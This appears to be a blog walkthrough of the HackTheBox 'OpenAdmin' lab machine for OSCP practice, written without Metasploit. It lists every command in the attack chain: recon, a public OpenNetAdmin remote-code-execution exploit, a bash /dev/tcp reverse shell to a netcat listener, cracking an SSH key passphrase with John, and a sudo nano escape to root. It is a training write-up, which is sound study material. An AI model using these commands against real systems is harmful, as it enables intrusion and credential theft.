DEV Community

Cover image for Writeup: HackTheBox OpenAdmin - Without Metasploit (OSCP Prep)
Chris 'Huey' S
Chris 'Huey' S

Posted on

Writeup: HackTheBox OpenAdmin - Without Metasploit (OSCP Prep)

I recently completed the OpenAdmin box from Hackthebox. While this box was rated as being easy it was a little tricky to get my footing and working around the box.

Command:

nmap -sC -sV -O -T4 -p- -oN nmap.txt 10.10.10.171

Alt Text

Ports Open:

  1. 22 OpenSSH 7.6p1, Is the main tool for connecting remote login with SSH. SSH encrypts all the traffic as well as providing Securing tunneling plus some other cool things.
  2. 80 Apache httpD 2.4.29, This is a free and open-source cross-platform web server. Mostly these servers run on Linux but some of the current/up-to-date ones run on Windows.

Being that I like messing around the website first I will skip over the first port and head directly over to the site.

Alt Text

So nothing too interesting here for me. So lets, fire up some Directory Busting tools.

Command:

dirb http://10.10.10.171/ -o dirb.txt

  1. -o = Will capture this in an output so if you want to clear your screen after it runs you can.

Alt Text

After some time we should get a pretty long list for directories found.

Alt Text
Alt Text

After getting the results we can now head over to the sites that were discovered. It appears to be some landing pages that don't provide too much information for us.

Alt Text

But after we get to the /music location it appears to be a login section which wasn't on the other sites.

Alt Text

Clicking on the login button should bring up a new page called /ona.

Alt Text

Searching on the page brings up the below User Info page. It shows us as being logged in as an guest and that the Database is running on mysqli.

Alt Text

Searching around some and we are able to find the version information.

v18.1.1

When typing ona v18.1.1 into Google, it provides us with the following.

OpenNetAdmin v18.1.1

OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. A full CLI interface is available as well to use for scripting and bulk work.

Alt Text

Now that we have this key information let's check for any exploits on Kali that we can use for it.

Command:

searchsploit OpenNetAdmin

Alt Text

Let's go with the last one.

Command:

locate php/webapps/47691.sh
cp /usr/share/exploitdb/exploits/php/webapps/47691.sh .

Alt Text

Command:

cat 47691.sh

Alt Text

The code above will push out a pseudo-shell for us.

Before running the code you will need to reformat it.

Command:

dos2unix 47691.sh

Command:

./47691.sh 10.10.10.171/ona/

This will bring up a limited shell on the machine. I decided to use another python script instead, so depending on what you want to do the option is yours.

Command:

wget https://raw.githubusercontent.com/amriunix/ona-rce/master/ona-rce.py

Alt Text

Let's run the code to read the options:

Command:

python3 ona-rce.py

Alt Text

After running the script we get 2 options. One of which is to check if the victim is vulnerable and another one to exploit.

Command:

python3 ona-rce.py check http://10.10.10.171/ona/

Alt Text

Now off to the races.

Command:

python3 ona-rce.py exploit http://10.10.10.171/ona/

Alt Text

So I am the www-data user.

Alt Text

Let's get a better shell on the machine.

Command:

nc -nvlp 1234

Alt Text

Command:

/bin/bash -C 'bash -i >& /dev/tcp/tun0/1234 0>&1'

Alt Text

Alt Text

I am going to check around on the box for any hidden files, while doing this I come across the following 2 users.

Alt Text

After some additional searches on the box I come across the following password for the localhost.

Alt Text

Save these creds to a file.
Now review the file to make sure.

Command:

cat password

Alt Text

Remember that there was a SSH port open before. I am going to try and use the usernames we found with the password we just discovered to login.

Alt Text

Something should have stuck out to you. When I copied that Password to my file I left out the ! by accident. Make sure you are paying close attention to this when you are running on a box.

No try this again with the !.

Alt Text

Let's look at what is running here.

Command:

netstat -a

Alt Text

We can see that a localhost:52846.

While looking at this directory, I see a file called main.php.

I tried to cat it but didn't show much from there so I am going to use Curl with the knowledge that netstat showed there is something running here at the localhost port 52846.

Command:

Curl http://127.0.0.1:52846/main.php

Alt Text

We can see that there is a RSA Private Key here.

Let's copy and paste this into a new file.

Command:

echo > key
nano key
Then paste the code, CTRL+X then Yes to save it.

Verify the contents of file by Cat the file.

I am going to use JohntheRipper to crack this.

But first if you haven't already unziped the txt.gz, do the following.

Command:

cd /usr/share/wordlists
gunzip rockyou.txt.gz
ls To verify that it worked.

Alt Text

Now let's run John!

Command:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt key

Alt Text

So save this password somewhere for the future bloodninjas.

Heading back over to the box, I am going to continue to look through what additional files I can find.

Command:

cat index.php

Alt Text

We see that there is another password here and looks to be hashed with Sha512!.

Grab this and we will run it in the Crackstation to see if it has been cracked.

Alt Text

Now using the id_rsa file which should include your RSA key, lets use this and the newly found password to log into Joanna.

Command:

chmod 600 id_rsa
ssh -i id_rsa joanna@10.10.10.171

input passphrase

Alt Text

Command:

sudo -l

Alt Text

This shows that No password is needed when run from the /bin/nano /opt/priv.

Head over to GTFObins Link
and you see there is a way to spawn a root shell.

Alt Text

Using nano to open the /bin/nano /opt/priv file you will now edit it.

Command:

reset; sh 1>&0 2>&0

Alt Text

Alt Text

Alt Text

Discussion (0)